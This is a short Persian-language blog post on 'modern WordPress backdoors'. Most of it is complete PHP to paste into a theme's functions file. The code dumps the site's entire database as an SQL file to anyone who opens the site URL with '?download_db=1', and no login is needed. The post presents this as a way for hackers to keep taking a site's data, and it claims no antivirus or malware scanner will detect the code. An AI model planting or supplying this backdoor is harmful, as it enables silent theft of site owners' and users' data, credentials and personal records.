بکدور های مدرن وردپرس
دانلود دیتابیس بدون ورود به سایت و سی پنل
بعضی وقتا هکر ها نیاز به ورود به سایت شما ندارن و فقط اطلاعات شما براشون ارزشمنده و میخوان بتونن هر وقت خواستن دیتابیش شما رو دانلود کنن
بدون اینکه حتی به سایت و سی پنل و … شما لاگین کنن
کافیه کد زیر را
function download_database_sql() {
if (isset($_GET[‘download_db’]) && $_GET[‘download_db’] === ‘1’) {
require_once(ABSPATH . ‘wp-config.php’);
header(‘Content-Type: application/sql’);
header(‘Content-Disposition: attachment; filename=”database.sql”‘);
$connection = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if (!$connection) {
die(‘خطا در اتصال به دیتابیس: ‘ . mysqli_connect_error());
}
$result = mysqli_query($connection, “SHOW TABLES”);
$tables = [];
while ($row = mysqli_fetch_row($result)) {
$tables[] = $row[0];
}
$sql_dump = ”;
foreach ($tables as $table) {
$result = mysqli_query($connection, “SELECT * FROM `$table`”);
$num_fields = mysqli_num_fields($result);
$sql_dump .= “DROP TABLE IF EXISTS `$table`;\n”;
$row2 = mysqli_fetch_row(mysqli_query($connection, “SHOW CREATE TABLE `$table`”));
$sql_dump .= $row2[1] . “;\n\n”;
while ($row = mysqli_fetch_row($result)) {
$sql_dump .= “INSERT INTO `$table` VALUES(“;
for ($j = 0; $j < $num_fields; $j++) {
$row[$j] = addslashes($row[$j]);
$sql_dump .= ‘”‘ . $row[$j] . ‘”‘;
if ($j < ($num_fields – 1)) {
$sql_dump .= ‘,’;
}
}
$sql_dump .= “);\n”;
}
$sql_dump .= “\n\n”;
}
mysqli_close($connection);
echo $sql_dump;
exit;
}
}
add_action(‘init’, ‘download_database_sql’);
در فاکشن قالب خودتون قرار بدید سپس ادرس سایتتون رو به این شکل باز کنید.
https:/site.com/?download_db=1
می بنید که با اضافه کردن این بکدور بدون هیچ لاگین و ورودی دیتابیس را با فرمت sql شروع به دانلود کردن میکنه
و کدی هم که در فاکشن قالب گذاشتید هیچ آنتی ویروس و مالوری به عنوان ویروس و بکدور نمیشناستش
آینده برنامه نویسی و هوش مصنوعی
